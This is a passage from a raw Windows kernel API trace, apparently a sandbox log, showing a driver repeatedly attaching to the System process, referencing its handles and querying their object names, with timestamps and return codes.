ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00069041044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.969] ObfDereferenceObject (Object=0xffffe00069104270) returned 0x8000 [0258.969] IoCompleteRequest () returned 0x0 [0258.969] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.969] PsAcquireProcessExitSynchronization () returned 0x0 [0258.969] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.969] ObReferenceObjectByHandle (in: Handle=0xffffffff80000cec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069104a50, HandleInformation=0x0) returned 0x0 [0258.969] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.969] PsReleaseProcessExitSynchronization () returned 0x2 [0258.969] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9d5 [0258.969] ObQueryNameString (in: Object=0xffffe00069104a50, ObjectNameInfo=0xffffe0006a4397c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a4397c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.970] ObfDereferenceObject (Object=0xffffe00069104a50) returned 0x8000 [0258.970] IoCompleteRequest () returned 0x0 [0258.970] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.970] PsAcquireProcessExitSynchronization () returned 0x0 [0258.970] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.970] ObReferenceObjectByHandle (in: Handle=0xffffffff80000cf4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.970] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.970] PsReleaseProcessExitSynchronization () returned 0x2 [0258.970] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9d4 [0258.970] IoCompleteRequest () returned 0x0 [0258.970] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.970] PsAcquireProcessExitSynchronization () returned 0x0 [0258.970] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.970] ObReferenceObjectByHandle (in: Handle=0xffffffff80000cfc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0007bf75980, HandleInformation=0x0) returned 0x0 [0258.970] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.970] PsReleaseProcessExitSynchronization () returned 0x2 [0258.970] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9d3 [0258.970] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006914d044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006914d044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0258.970] ObfDereferenceObject (Object=0xffffe0007bf75980) returned 0x7ffd [0258.970] IoCompleteRequest () returned 0x0 [0258.970] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.970] PsAcquireProcessExitSynchronization () returned 0x0 [0258.970] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.970] ObReferenceObjectByHandle (in: Handle=0xffffffff80000d08, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000691d7700, HandleInformation=0x0) returned 0x0 [0258.970] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.970] PsReleaseProcessExitSynchronization () returned 0x2 [0258.970] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9d2 [0258.970] ObQueryNameString (in: Object=0xffffe000691d7700, ObjectNameInfo=0xffffe0006a40c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a40c7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.970] ObfDereferenceObject (Object=0xffffe000691d7700) returned 0x8000 [0258.970] IoCompleteRequest () returned 0x0 [0258.970] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.970] PsAcquireProcessExitSynchronization () returned 0x0 [0258.970] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.970] ObReferenceObjectByHandle (in: Handle=0xffffffff80000d0c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.970] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.970] PsReleaseProcessExitSynchronization () returned 0x2 [0258.970] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9d1 [0258.970] IoCompleteRequest () returned 0x0 [0258.970] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.970] PsAcquireProcessExitSynchronization () returned 0x0 [0258.970] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.970] ObReferenceObjectByHandle (in: Handle=0xffffffff80000d1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.970] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.970] PsReleaseProcessExitSynchronization () returned 0x2 [0258.970] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9d0 [0258.970] IoCompleteRequest () returned 0x0 [0258.971] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.971] PsAcquireProcessExitSynchronization () returned 0x0 [0258.971] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.971] ObReferenceObjectByHandle (in: Handle=0xffffffff80000d30, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000691cf700, HandleInformation=0x0) returned 0x0 [0258.971] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.971] PsReleaseProcessExitSynchronization () returned 0x2 [0258.971] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9cf [0258.971] ObQueryNameString (in: Object=0xffffe000691cf700, ObjectNameInfo=0xffffe0006a4147c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a4147c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.971] ObfDereferenceObject (Object=0xffffe000691cf700) returned 0x8000 [0258.971] IoCompleteRequest () returned 0x0 [0258.971] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.971] PsAcquireProcessExitSynchronization () returned 0x0 [0258.971] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.971] ObReferenceObjectByHandle (in: Handle=0xffffffff80000d3c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a647dd0, HandleInformation=0x0) returned 0x0 [0258.971] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.971] PsReleaseProcessExitSynchronization () returned 0x2 [0258.971] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9ce [0258.971] ObQueryNameString (in: Object=0xffffe0006a647dd0, ObjectNameInfo=0xffffe0006a44d7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a44d7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.971] ObfDereferenceObject (Object=0xffffe0006a647dd0) returned 0x8000 [0258.971] IoCompleteRequest () returned 0x0 [0258.971] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.971] PsAcquireProcessExitSynchronization () returned 0x0 [0258.971] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.971] ObReferenceObjectByHandle (in: Handle=0xffffffff80000d44, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.971] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.971] PsReleaseProcessExitSynchronization () returned 0x2 [0258.971] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9cd [0258.971] IoCompleteRequest () returned 0x0 [0258.971] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.971] PsAcquireProcessExitSynchronization () returned 0x0 [0258.971] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.971] ObReferenceObjectByHandle (in: Handle=0xffffffff80000d48, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.971] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.971] PsReleaseProcessExitSynchronization () returned 0x2 [0258.971] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9cc [0258.971] IoCompleteRequest () returned 0x0 [0258.971] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.971] PsAcquireProcessExitSynchronization () returned 0x0 [0258.971] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.971] ObReferenceObjectByHandle (in: Handle=0xffffffff80000d4c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a0a8860, HandleInformation=0x0) returned 0x0 [0258.971] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.971] PsReleaseProcessExitSynchronization () returned 0x2 [0258.971] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9cb [0258.971] ObQueryNameString (in: Object=0xffffe0006a0a8860, ObjectNameInfo=0xffffe0006a3307c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3307c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.971] ObfDereferenceObject (Object=0xffffe0006a0a8860) returned 0x7fff [0258.971] IoCompleteRequest () returned 0x0 [0258.972] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.972] PsAcquireProcessExitSynchronization () returned 0x0 [0258.972] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.972] ObReferenceObjectByHandle (in: Handle=0xffffffff80000d6c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069373ae0, HandleInformation=0x0) returned 0x0 [0258.972] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.972] PsReleaseProcessExitSynchronization () returned 0x2 [0258.972] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9ca [0258.972] ObQueryNameString (in: Object=0xffffe00069373ae0, ObjectNameInfo=0xffffe0006a331244, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a331244, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.972] ObfDereferenceObject (Object=0xffffe00069373ae0) returned 0x8000 [0258.972] IoCompleteRequest () returned 0x0 [0258.972] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.972] PsAcquireProcessExitSynchronization () returned 0x0 [0258.972] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.972] ObReferenceObjectByHandle (in: Handle=0xffffffff80000d70, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00068a65950, HandleInformation=0x0) returned 0x0 [0258.972] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.972] PsReleaseProcessExitSynchronization () returned 0x2 [0258.972] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9c9 [0258.972] ObQueryNameString (in: Object=0xffffe00068a65950, ObjectNameInfo=0xffffe0006a3f8044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3f8044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.972] ObfDereferenceObject (Object=0xffffe00068a65950) returned 0x8000 [0258.972] IoCompleteRequest () returned 0x0 [0258.972] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.972] PsAcquireProcessExitSynchronization () returned 0x0 [0258.972] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.972] ObReferenceObjectByHandle (in: Handle=0xffffffff80000d74, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.972] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.972] PsReleaseProcessExitSynchronization () returned 0x2 [0258.972] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9c8 [0258.972] IoCompleteRequest () returned 0x0 [0258.972] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.972] PsAcquireProcessExitSynchronization () returned 0x0 [0258.972] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.972] ObReferenceObjectByHandle (in: Handle=0xffffffff80000d78, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.972] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.972] PsReleaseProcessExitSynchronization () returned 0x2 [0258.972] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9c7 [0258.972] IoCompleteRequest () returned 0x0 [0258.972] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.972] PsAcquireProcessExitSynchronization () returned 0x0 [0258.972] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.972] ObReferenceObjectByHandle (in: Handle=0xffffffff80000d7c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000691f0850, HandleInformation=0x0) returned 0x0 [0258.972] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.972] PsReleaseProcessExitSynchronization () returned 0x2 [0258.972] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9c6 [0258.972] ObQueryNameString (in: Object=0xffffe000691f0850, ObjectNameInfo=0xffffe00068a59684, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068a59684, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.972] ObfDereferenceObject (Object=0xffffe000691f0850) returned 0x8000 [0258.972] IoCompleteRequest () returned 0x0 [0258.972] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.973] PsAcquireProcessExitSynchronization () returned 0x0 [0258.973] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.973] ObReferenceObjectByHandle (in: Handle=0xffffffff80000d84, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a049460, HandleInformation=0x0) returned 0x0 [0258.973] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.973] PsReleaseProcessExitSynchronization () returned 0x2 [0258.973] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9c5 [0258.973] ObQueryNameString (in: Object=0xffffe0006a049460, ObjectNameInfo=0xffffe0006a816044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a816044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.973] ObfDereferenceObject (Object=0xffffe0006a049460) returned 0x8000 [0258.973] IoCompleteRequest () returned 0x0 [0258.973] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.973] PsAcquireProcessExitSynchronization () returned 0x0 [0258.973] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.973] ObReferenceObjectByHandle (in: Handle=0xffffffff80000da0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.973] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.973] PsReleaseProcessExitSynchronization () returned 0x2 [0258.973] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9c4 [0258.973] IoCompleteRequest () returned 0x0 [0258.973] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.973] PsAcquireProcessExitSynchronization () returned 0x0 [0258.973] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.973] ObReferenceObjectByHandle (in: Handle=0xffffffff80000db4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.973] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.973] PsReleaseProcessExitSynchronization () returned 0x2 [0258.973] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9c3 [0258.973] IoCompleteRequest () returned 0x0 [0258.973] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.973] PsAcquireProcessExitSynchronization () returned 0x0 [0258.973] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.973] ObReferenceObjectByHandle (in: Handle=0xffffffff80000dd0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.973] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.973] PsReleaseProcessExitSynchronization () returned 0x2 [0258.973] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9c2 [0258.973] IoCompleteRequest () returned 0x0 [0258.973] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.973] PsAcquireProcessExitSynchronization () returned 0x0 [0258.973] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.973] ObReferenceObjectByHandle (in: Handle=0xffffffff80000de0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.973] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.973] PsReleaseProcessExitSynchronization () returned 0x2 [0258.973] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9c1 [0258.973] IoCompleteRequest () returned 0x0 [0258.973] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.973] PsAcquireProcessExitSynchronization () returned 0x0 [0258.973] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.973] ObReferenceObjectByHandle (in: Handle=0xffffffff80000de8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.973] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.973] PsReleaseProcessExitSynchronization () returned 0x2 [0258.974] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9c0 [0258.974] IoCompleteRequest () returned 0x0 [0258.974] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.974] PsAcquireProcessExitSynchronization () returned 0x0 [0258.974] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.974] ObReferenceObjectByHandle (in: Handle=0xffffffff80000dec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a2c1f20, HandleInformation=0x0) returned 0x0 [0258.974] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.974] PsReleaseProcessExitSynchronization () returned 0x2 [0258.974] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9bf [0258.974] ObQueryNameString (in: Object=0xffffe0006a2c1f20, ObjectNameInfo=0xffffe0006a2a6044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a2a6044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.974] ObfDereferenceObject (Object=0xffffe0006a2c1f20) returned 0x7ffe [0258.974] IoCompleteRequest () returned 0x0 [0258.974] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.974] PsAcquireProcessExitSynchronization () returned 0x0 [0258.974] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.974] ObReferenceObjectByHandle (in: Handle=0xffffffff80000df0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069fa23e0, HandleInformation=0x0) returned 0x0 [0258.974] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.974] PsReleaseProcessExitSynchronization () returned 0x2 [0258.974] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9be [0258.974] ObQueryNameString (in: Object=0xffffe00069fa23e0, ObjectNameInfo=0xffffe0006a3f5044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3f5044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.974] ObfDereferenceObject (Object=0xffffe00069fa23e0) returned 0x7ffe [0258.974] IoCompleteRequest () returned 0x0 [0258.974] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.974] PsAcquireProcessExitSynchronization () returned 0x0 [0258.974] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.974] ObReferenceObjectByHandle (in: Handle=0xffffffff80000df4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a2bf090, HandleInformation=0x0) returned 0x0 [0258.974] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.974] PsReleaseProcessExitSynchronization () returned 0x2 [0258.974] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9bd [0258.974] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a0d0044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a0d0044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0258.974] ObfDereferenceObject (Object=0xffffe0006a2bf090) returned 0x7fda [0258.974] IoCompleteRequest () returned 0x0 [0258.974] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.974] PsAcquireProcessExitSynchronization () returned 0x0 [0258.974] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.974] ObReferenceObjectByHandle (in: Handle=0xffffffff80000e04, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a6b6070, HandleInformation=0x0) returned 0x0 [0258.974] ObfDereferenceObject (Object=0xffffe0006a6b6070) returned 0x7ffc [0258.974] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.974] PsReleaseProcessExitSynchronization () returned 0x2 [0258.974] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9bc [0258.974] IoCompleteRequest () returned 0x0 [0258.974] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.974] PsAcquireProcessExitSynchronization () returned 0x0 [0258.974] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.974] ObReferenceObjectByHandle (in: Handle=0xffffffff80000e0c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: 